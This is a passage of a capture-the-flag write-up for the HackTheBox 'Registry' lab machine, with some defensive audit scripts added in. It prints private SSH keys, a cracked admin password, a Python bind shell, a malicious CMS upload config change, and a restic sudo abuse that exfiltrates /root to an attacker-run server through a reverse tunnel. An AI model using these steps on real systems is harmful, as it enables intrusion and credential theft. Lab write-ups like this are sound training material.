 bVpjhWwaBftgd+KNg9xl5RTNXs3hjJePHc5y06SfOpOBYqgdL42UlAcSEwoQ76VB
 YGk+dTQrDILawDDGnSiOGMrn4hzmtRAarLZWvGiOdppdIqsfpKYfUcsgENjTK95z
 zrey3tjXzObM5L1MkjYYIYVjXMMygJDaPLQZfZTchUNp8uWdnamIVrvqHGvWYES/
 FGoeATGL9J5NVXlMA2fXRue84sR7q3ikLgxDtlh6w5TpO19pGBO9Cmg1+1jqRfof
 eIb4IpAp01AVnMl/D/aZlHb7adV+snGydmT1S9oaN+3z/3pHQu3Wd7NWsGMDmNdA
 +GB79xf0rkL0E6lRi7eSySuggposc4AHPAzWYx67IK2g2kxx9M4lCImUO3oftGKJ
 P/ccClA4WKFMshADxxh/eWJLCCSEGvaLoow+b1lcIheDYmOxQykBmg5AM3WpTpAN
 T+bI/6RA+2aUm92bNG+P/Ycsvvyh/jFm5vwoxuKwINUrkACdQ3gRakBc1eH2x014
 6B/Yw+ZGcyj738GHH2ikfyrngk1M+7IFGstOhUed7pZORnhvgpgwFporhNOtlvZ1
 /e9jJqfo6W8MMDAe4SxCMDujGRFiABU3FzD5FjbqDzn08soaoylsNQd/BF7iG1RB
 Y7FEPw7yZRbYfiY8kfve7dgSKfOADj98fTe4ISDG9mP+upmR7p8ULGvt+DjbPVd3
 uN3LZHaX5ECawEt//KvO0q87TP8b0pofBhTmJHUUnVW2ryKuF4IkUM3JKvAUTSg8
 K+4aT7xkNoQ84UEQvfZvUfgIpxcj6kZYnF+eakV4opmgJjVgmVQvEW4nf6ZMBRo8
 TTGugKvvTw/wNKp4BkHgXxWjyTq+5gLyppKb9sKVHVzAEpew3V20Uc30CzOyVJZi
 Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H
 pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s
 OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B
 Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR
 bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM
 PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu
 Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ
 ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI
 f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9
 RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
 94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
 -----END RSA PRIVATE KEY-----
 
 root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh
 ❯
 
 
 | 
I moved the id_rsa into my Registry directory and logged in over SSH, entering the passphrase from the expect script when prompted:
| 
 root in htb/boxes/Registry
 ❯ ssh -v -i id_rsa bolt@registry.htb
 OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
 debug1: Reading configuration data /etc/ssh/ssh_config
 debug1: /etc/ssh/ssh_config line 19: Applying options for *
 debug1: Connecting to registry.htb [10.10.10.159] port 22.
 debug1: Connection established.
 debug1: identity file id_rsa type 0
 debug1: identity file id_rsa-cert type -1
 debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
 debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
 debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
 debug1: Authenticating to registry.htb:22 as 'bolt'
 debug1: SSH2_MSG_KEXINIT sent
 debug1: SSH2_MSG_KEXINIT received
 debug1: kex: algorithm: curve25519-sha256
 debug1: kex: host key algorithm: ecdsa-sha2-nistp256
 debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
 debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
 debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
 debug1: Server host key: ecdsa-sha2-nistp256 SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs
 debug1: Host 'registry.htb' is known and matches the ECDSA host key.
 debug1: Found key in /root/.ssh/known_hosts:5
 debug1: rekey out after 134217728 blocks
 debug1: SSH2_MSG_NEWKEYS sent
 debug1: expecting SSH2_MSG_NEWKEYS
 debug1: SSH2_MSG_NEWKEYS received
 debug1: rekey in after 134217728 blocks
 debug1: Will attempt key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 debug1: SSH2_MSG_EXT_INFO received
 debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
 debug1: SSH2_MSG_SERVICE_ACCEPT received
 debug1: Authentications that can continue: publickey,password
 debug1: Next authentication method: publickey
 debug1: Offering public key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 debug1: Server accepts key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 Enter passphrase for key 'id_rsa':
 debug1: Authentication succeeded (publickey).
 Authenticated to registry.htb ([10.10.10.159]:22).
 debug1: channel 0: new [client-session]
 debug1: Requesting no-more-sessions@openssh.com
 debug1: Entering interactive session.
 debug1: pledge: network
 debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
 debug1: Sending environment.
 debug1: Sending env LANG = en_US.utf8
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
 
 System information as of Sat Apr  4 01:14:31 UTC 2020
 
 System load:  0.0               Users logged in:                1
 Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
 Memory usage: 39%               IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage:   0%                IP address for docker0:         172.17.0.1
 Processes:    163
 Last login: Sat Apr  4 00:57:04 2020 from 10.10.15.8
 bolt@bolt:~$ whoami & hostname
 [1] 6324
 bolt
 bolt
 bolt@bolt:~$
 
 
 | 
and finally I can get user.txt:
| 
 bolt@bolt:~$ whoami & hostname
 [1] 6324
 bolt
 bolt
 bolt@bolt:~$ ls
 user.txt
 [1]+  Done                    whoami
 bolt@bolt:~$ cat user.txt
 ytc0y[-----------------------]3ywzi
 bolt@bolt:~$
 
 
 | 
Exploitation
Now it is time to enumerate again, this time from the bolt user shell. I used LinPEAS, and found that a CMS, "Bolt CMS", is installed on the machine.
wget and curl were not working, so I used netcat to transfer linpeas.sh:
| 
 
 bolt@bolt:/tmp$ nc -l -p 1234 > linpeas.sh
 
 
 root in boxes/Registry/docker
 ❯ nc -w 3 10.10.10.159 1234 < linpeas.sh
 
 
 
 bolt@bolt:/tmp$ chmod +x linpeas.sh
 bolt@bolt:/tmp$ bash linpeas.sh
 
 
 | 
| # bash
 ====================================( Basic information )=====================================
 OS: Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019
 User & Groups: uid=1001(bolt) gid=1001(bolt) groups=1001(bolt)
 Hostname: bolt
 Writable folder: /dev/shm
 [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
 [+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
 [+] nmap is available for network discover & port scanning, you should use it yourself
 
 
 | 
BOLT CMS WEBSITE
Going deeper in the recon, I see a bolt.db SQLite database that contains a password hash, and the CMS installed under /var/www/html:
| # bash
 [+] Looking for tables inside readable .db/.sqlite files (limit 100)
 -> Extracting tables from /var/www/html/bolt/vendor/codeception/codeception/tests/data/sqlite.db (limit 20)
 -> Extracting tables from /var/www/html/bolt/tests/phpunit/unit/resources/db/bolt.db (limit 20)
 --> Found for interesting column names in bolt_authtoken (output limit 10)
 CREATE TABLE bolt_authtoken (id INTEGER NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL, PRIMARY KEY(id))
 --> Found for interesting column names in bolt_users (output limit 10)
 CREATE TABLE bolt_users (id INTEGER NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
 , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
 , PRIMARY KEY(id))
 
 -> Extracting tables from /var/www/html/bolt/app/database/bolt.db (limit 20)
 --> Found for interesting column names in bolt_authtoken (output limit 10)
 CREATE TABLE bolt_authtoken (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL)
 9, 1, None, 2e3f688aab59a4586f54fbd3f284eb3b941b0580142356d840c7e582801b6388, 33aa58459b97be252a29fd98e3cdf81b, 2020-04-04 18:48:37, 10.10.15.104, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0, 2020-04-18 18:48:37
 --> Found for interesting column names in bolt_users (output limit 10)
 CREATE TABLE bolt_users (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
 , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
 )
 1, admin, $2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK, bolt@registry.htb, 2020-04-04 22:00:22, 10.10.15.139, Admin, ["files:
 
 
 [+] Web files?(output limit)
 /var/www/:
 total 16K
 drwxr-xr-x  4 root     root     4.0K May 26  2019 .
 drwxr-xr-x 14 root     root     4.0K May 19  2019 ..
 drwx------  3 root     root     4.0K May 26  2019 .cache
 drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 html
 
 /var/www/html:
 total 32K
 drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 .
 
 
 | 
I visited the Bolt website at registry.htb/bolt.

Then I cracked the bcrypt password hash with John the Ripper:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15
❯ john bolt-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (admin)
1g 0:00:00:05 DONE (2020-04-05 06:54) 0.1996g/s 71.85p/s 71.85c/s 71.85C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root in htb/boxes/Registry via 🐘 v7.3.15 took 9s
❯
```
After only 9 seconds I had the password strawberry and used it to log in to Bolt CMS.
BOLT CMS LOGIN PAGE

After login it displays the dashboard, which has a lot of features.
BOLT CMS DASHBOARD PAGE

I searched for a Bolt CMS exploit and found this article, which targets the same Bolt CMS version that is installed on the Registry machine.
I tried to follow the exploit, but it didn't work. This part was also really hard because a cron job on the box reverts every change you make, so I needed to be as fast as possible.
This is the default config.yml in the Bolt CMS configuration, where you can edit accept_file_types.

In the configuration file I added the php and py extensions so I could upload my web shells. Why two different files? The PHP reverse shell was not working, so I looked for another shell that I could execute to get remote access on the web server.
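From the defender's side, accept_file_types is the single setting that decides whether a CMS upload can turn into a web shell, so it is worth auditing rather than trusting the default. The following is an added example, not code from this writeup or from Bolt: it reads the flow-style accept_file_types line from a constructed config.yml sample, reports any extension the web server would execute, and applies an allow-list check to filenames that looks at every suffix (so shell.php.txt is refused even when txt is allowed). The set of executable extensions and both sample configs are assumptions made for the example.

```python
import re

# Extensions a typical Apache/PHP host will execute if the file lands under the
# document root. Assumption for this example; match it to the real handler config.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                         "py", "pl", "sh", "cgi"}

# Constructed samples modelled on Bolt's flow-style list: the stock list, and the
# list after php/py were added the way the writeup describes.
DEFAULT_CONFIG = (
    "accept_file_types: [ twig, html, js, css, scss, gif, jpg, jpeg, png, ico, "
    "zip, tgz, txt, md, doc, docx, pdf ]\n"
)
MODIFIED_CONFIG = "accept_file_types: [ twig, html, js, css, gif, jpg, png, txt, php, py ]\n"

_FLOW_LIST = re.compile(r"^\s*accept_file_types\s*:\s*\[(?P<items>[^\]]*)\]", re.M)


def parse_accept_file_types(config_text):
    """Return the extensions listed on a flow-style accept_file_types line."""
    m = _FLOW_LIST.search(config_text)
    if not m:
        return []
    return [item.strip().strip("'\"").lower()
            for item in m.group("items").split(",") if item.strip()]


def audit_accept_file_types(config_text):
    """Return the allowed extensions that would let an upload run as server code."""
    allowed = set(parse_accept_file_types(config_text))
    return sorted(allowed & EXECUTABLE_EXTENSIONS)


def is_upload_allowed(filename, allowed):
    """Allow-list check over every suffix of the basename, not just the last one.

    A file with no extension is refused; a file is accepted only if each suffix is
    on the allow list and none of them is server-executable.
    """
    basename = filename.lower().rsplit("/", 1)[-1]
    suffixes = basename.split(".")[1:]
    if not suffixes:
        return False
    return all(s in allowed and s not in EXECUTABLE_EXTENSIONS for s in suffixes)


if __name__ == "__main__":
    for label, cfg in (("default", DEFAULT_CONFIG), ("modified", MODIFIED_CONFIG)):
        print(label, "executable extensions allowed:", audit_accept_file_types(cfg))
    allowed = parse_accept_file_types(MODIFIED_CONFIG)
    for name in ("photo.jpg", "shell.php", "shell.php.txt"):
        print(name, "->", is_upload_allowed(name, allowed))
```

Running the audit against a deployed config.yml on a schedule, or from the cron job the box already has, would catch exactly the change made on this machine.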

Eventually I found that I could use a bind shell to gain a remote shell, so I wrote a simple bind shell in Python, similar to this one:
```python
import os
import pty
import socket

PORT = 9001

# Listen on all interfaces and wait for a single client to connect.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(1)
(rem, addr) = s.accept()
# Point stdin, stdout and stderr at the accepted connection.
os.dup2(rem.fileno(), 0)
os.dup2(rem.fileno(), 1)
os.dup2(rem.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
```
I saved it, then used p0wnyShell to run the bind shell (shell.py) and connect to it from my Kali Linux machine. After setting everything up, I uploaded both files through File Management inside Bolt CMS.

Now I open p0wnyShell and run shell.py.

You will see that the port is already in use, but that is fine: I can still connect from my Kali Linux machine, and now I have a shell as www-data.
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ nc -v 10.10.10.159 9001
registry.htb [10.10.10.159] 9001 (?) open
www-data@bolt:~/html/bolt/files$ ls
ls
www-data@bolt:~/html/bolt/files$ whoami
whoami
www-data
```
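A bind shell like the one above is visible to the defender as a listening socket owned by the web server's uid on a port the service never uses. The following added example (not part of the original writeup) parses a constructed excerpt in the format of /proc/net/tcp, decodes the kernel's little-endian hex addresses, and flags listeners owned by service accounts outside their expected ports. The uid-to-port policy and the sample rows are assumptions made for the example; on a real host read /proc/net/tcp (and tcp6) directly.

```python
import socket
import struct

# Constructed excerpt in /proc/net/tcp layout: sshd on :22, Apache on :80, a
# listener on :9001 owned by uid 33 (www-data), a loopback listener on :8000
# owned by uid 1001, and one established Apache connection (state 01, ignored).
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18761 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 19213 1 0000000000000000 100 0 0 10 0
   2: 00000000:2329 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 54321 1 0000000000000000 100 0 0 10 0
   3: 0100007F:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 55210 1 0000000000000000 100 0 0 10 0
   4: 9F0A0A0A:0050 8B0F0A0A:C3F2 01 00000000:00000000 00:00000000 00000000    33        0 55900 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp

# Service accounts that should never listen except on their own ports.
# Assumption for the example; derive the real mapping from /etc/passwd and
# the service configuration of the host being checked.
SERVICE_ACCOUNT_PORTS = {33: {"name": "www-data", "ports": {80, 443}}}


def decode_addr(hex_addr):
    """'0100007F:1F40' -> ('127.0.0.1', 8000). IPv4 is stored little-endian."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(text):
    """Return the LISTEN entries as dicts with ip, port, uid and inode."""
    entries = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        entries.append({"ip": ip, "port": port,
                        "uid": int(fields[7]), "inode": int(fields[9])})
    return entries


def suspicious_listeners(text, policy=SERVICE_ACCOUNT_PORTS):
    """Listeners owned by a policed service account on a port outside its allowance."""
    hits = []
    for entry in listening_sockets(text):
        account = policy.get(entry["uid"])
        if account and entry["port"] not in account["ports"]:
            hits.append((account["name"], entry["ip"], entry["port"], entry["inode"]))
    return hits


if __name__ == "__main__":
    for name, ip, port, inode in suspicious_listeners(PROC_NET_TCP):
        print(f"{name} is listening on {ip}:{port} (socket inode {inode})")
```

The inode in the result is the handle for the next step: matching it against /proc/*/fd links identifies the owning process, which for this box would be the python interpreter started from the CMS upload directory.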
Privilege Escalation
As the www-data user we can run restic with sudo:
```bash
www-data@bolt:~/html/bolt/files$ sudo -l
sudo -l
Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bolt:
(root) NOPASSWD: /usr/bin/restic backup -r rest*
www-data@bolt:~/html/bolt/files$
```
Since we can run restic as root, we can use it to get root.
RESTIC BACKUP PROGRAM
So what is Restic ?
Restic is a backup program that is fast, efficient and secure. It supports the three major operating systems (Linux, macOS, Windows) and a few smaller ones (FreeBSD, OpenBSD).
Since restic runs as root for us, we can back up the /root directory and from its contents get the administrator shell.
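The sudoers entry is the whole privilege-escalation story: in `restic backup -r rest*` the trailing wildcard is a glob matched against the remainder of the command line, so www-data chooses both the repository and what gets backed up into it, and root-readable files can be shipped to any REST server the box can reach. The following added example (not from the writeup) parses constructed sudoers lines, the rule from this box next to two tighter variants, and flags NOPASSWD root rules whose arguments contain shell-style wildcards. The parser covers plain user specifications only (no aliases, no #include); the sample lines are constructed.

```python
import re

# Constructed sudoers lines: the rule seen on this box, a variant that pins the
# repository URL and the backed-up path, and an unrelated service restart rule.
# Not the machine's real /etc/sudoers.
SUDOERS_SAMPLE = """\
# constructed example, not a real sudoers file
www-data ALL=(root) NOPASSWD: /usr/bin/restic backup -r rest*
backup   ALL=(root) NOPASSWD: /usr/bin/restic backup -r rest:https://backup.example.internal:8000/ /srv/www
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"        # optional (runas_user[:runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"           # NOPASSWD:, SETENV:, ...
    r"(?P<cmd>.+)$"
)
GLOB_CHARS = re.compile(r"[*?\[]")


def parse_sudoers(text):
    """Parse simple 'user host=(runas) TAGS: command' lines into dicts."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        # sudo runs commands as root when no runas is given
        runas = (m.group("runas") or "root").split(":")[0].strip()
        rules.append({
            "user": m.group("user"),
            "runas": runas,
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "cmd": m.group("cmd").strip(),
        })
    return rules


def audit_rule(rule):
    """Finding codes for one rule; only root-equivalent rules are examined."""
    findings = []
    if rule["runas"] not in ("root", "ALL"):
        return findings
    if rule["nopasswd"]:
        findings.append("NOPASSWD_ROOT")
    argv = rule["cmd"].split()
    if argv[0] == "ALL":
        findings.append("ANY_COMMAND")
        return findings
    if not argv[0].startswith("/"):
        findings.append("RELATIVE_COMMAND_PATH")
    # sudoers matches arguments as one space-separated string, so a glob here
    # lets the caller supply everything that follows it.
    globbed = [a for a in argv[1:] if GLOB_CHARS.search(a)]
    if globbed:
        findings.append("WILDCARD_ARGS:" + ",".join(globbed))
    return findings


def audit_sudoers(text):
    """Map each user in the file to the findings for its rules."""
    return {r["user"]: audit_rule(r) for r in parse_sudoers(text)}


if __name__ == "__main__":
    for user, findings in audit_sudoers(SUDOERS_SAMPLE).items():
        print(f"{user}: {findings or 'no findings'}")
```

The tighter variant in the sample shows the fix that keeps the backup job working: name the repository URL and the source path explicitly instead of leaving a wildcard after -r.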
First I installed restic on my Kali Linux machine:
```bash
sudo apt-get install restic
```
After the installation, I created a backups folder and initialised it as a restic repository protected by a password:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4m1s
❯ mkdir backups

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ restic init -r ./backups/
enter password for new repository:
enter password again:
created restic repository 6f893c5da1 at ./backups/

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s
❯
```
Looking at the backups directory:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s
❯ ls backups/
config  data  index  keys  locks  snapshots

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯
```
SETTING UP THE SERVER
Now I install Docker on my machine so I can start a restic REST server on port 8000:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ sudo apt install docker.io
```
Now I run the restic REST server in Docker, mapping my backups directory to /backups inside the container. Note from the startup output that authentication is disabled, so anything that can reach port 8000 can read and write this repository:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ docker run -p 8000:8000 -v /root/htb/boxes/Registry/backups/:/backups -it restic/rest-server sh
/
rest-server 0.9.7 compiled with go1.10 on linux/amd64
Data directory: /backups
Authentication disabled
Private repositories disabled
Starting server on :8000
```
After the server has started, go back to the bolt user shell and set up a reverse SSH tunnel. With -R 8000:127.0.0.1:8000, port 8000 on the box is forwarded back to the REST server listening on 127.0.0.1:8000 on my machine:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

System information as of Sun Apr  5 01:51:21 UTC 2020

System load:  0.0               Users logged in:                1
Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
Memory usage: 37%               IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage:   1%                IP address for docker0:         172.17.0.1
Processes:    164
Last login: Sun Apr  5 01:15:52 2020 from 10.10.15.43
bolt@bolt:~$
```
CREATING BACKUPS
Looks good! Now I can create the backup from the www-data shell. I chose to back up the /root folder, because that is what I need to become the administrator:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ nc -v 10.10.10.159 12346
registry.htb [10.10.10.159] 12346 (?) open
www-data@bolt:~/html/bolt/files$

www-data@bolt:~/html/bolt/files$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
</restic backup -r rest:http://127.0.0.1:8000/ /root
enter password for repository: -------------

password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:01] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00
duration: 0:01
snapshot 4d60990a saved
www-data@bolt:~/html/bolt/files$
```
The snapshot was saved successfully. Back on my machine, I restored the backup I had just created:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ restic -r backups/ restore latest --target restore/
enter password for repository:
repository 6f893c5d opened successfully, password is correct
created new cache in /root/.cache/restic
restoring <Snapshot 4d60990a of [/root] at 2020-04-05 01:58:02.792216091 +0000 UTC by root@bolt> to restore/

root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4s
❯
```
Success! This creates a restore/ folder containing all the files we need, and from there I can read root.txt:
```bash
root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
❯ cd restore

root in boxes/Registry/restore
❯ ls
root

root in boxes/Registry/restore
❯ cd root

root in Registry/restore/root
❯ ls
config.yml  cron.sh  root.txt

root in Registry/restore/root
❯ cat root.txt
ntrk[---------------------]kztgw
```
That isn't enough; we want the administrator shell, so I use the id_rsa inside .ssh:
```bash
root in Registry/restore/root
❯ ls -la
total 76
drwx------ 7 root root  4096 Oct 21 18:37 .
drwx------ 3 root root  4096 Apr  5 09:59 ..
lrwxrwxrwx 1 root root     9 May 29  2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root  3106 Sep 27  2019 .bashrc
drwx------ 2 root root  4096 Sep 27  2019 .cache
drwxr-xr-x 3 root root  4096 Sep 27  2019 .config
-rw-r--r-- 1 root root 20999 Oct 21 18:04 config.yml
-rw-r--r-- 1 root root   118 Oct 21 18:37 cron.sh
drwx------ 3 root root  4096 Sep 27  2019 .gnupg
drwxr-xr-x 3 root root  4096 Oct  9 04:57 .local
-rw-r--r-- 1 root root   148 Aug 17  2015 .profile
-r-------- 1 root root    33 Sep 27  2019 root.txt
-rw-r--r-- 1 root root    66 Oct 21 18:00 .selected_editor
drwxr-xr-x 2 root root  4096 Oct 17 17:58 .ssh
-rw-r--r-- 1 root root   215 Oct 21 16:59 .wget-hsts

root in Registry/restore/root
❯ cd .ssh

root in restore/root/.ssh
❯ ls
authorized_keys  id_rsa  id_rsa.pub

root in restore/root/.ssh
❯ chmod 600 id_rsa

root in restore/root/.ssh
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAmiGiXpswTyHhjgC55jHRWlGX1asEMyDFfkVwhuNohv/4cQKm
cJB/3psQocosq+GMh9Y/uRPUgMcDnrTaNYOdkPS+QLd8vcFKSwSewH1w4/AYLuci
4k71qYsJlkcS2Pb0PqEcpodmXf4OBdTCiCCnjgGhOcvPpKMSCb1vy2Yo+A+eHzKp
1S48LgJRLKU1sGe0KE4MC8g7qpF7NSKOCW69z5KaoopQA3jPxnW17WE9PdGZQvqX
4/Mf9DGdeUrejRlX0BI2EGiZhPKwwKxqIHLRpw4pR4+OjR1sOkAA7UWtMYn/3cs+
IS3L75/i5Qsr0cMCtZ/hQAKtjpPoCCe1qHp7CQIDAQABAoIBAFlvYtQaoLGKK2NG
sJgOGDicV8o37bvtLCvVBzJ+Ck0rgnGw4/s1Hb2BpOj8c2dY/T5k55zxEMGYuVUC
BAxBTtCp8yuCTPOekQluqN9w6myZCK9Ol0NSJeI3N1zn6NvUkG0293T55EBuBp0D
k82BhTg1YeQzi00xAmp8bb5MjUFCiCbSFH1MMpY/9itg1b3mqx7UlyDldMM9UdKH
HS9aZmAzY5/U6wEtJi4mx3QIoVahytMgcxd7qoicCYyVm73HFQsZ58L+5QflygH4
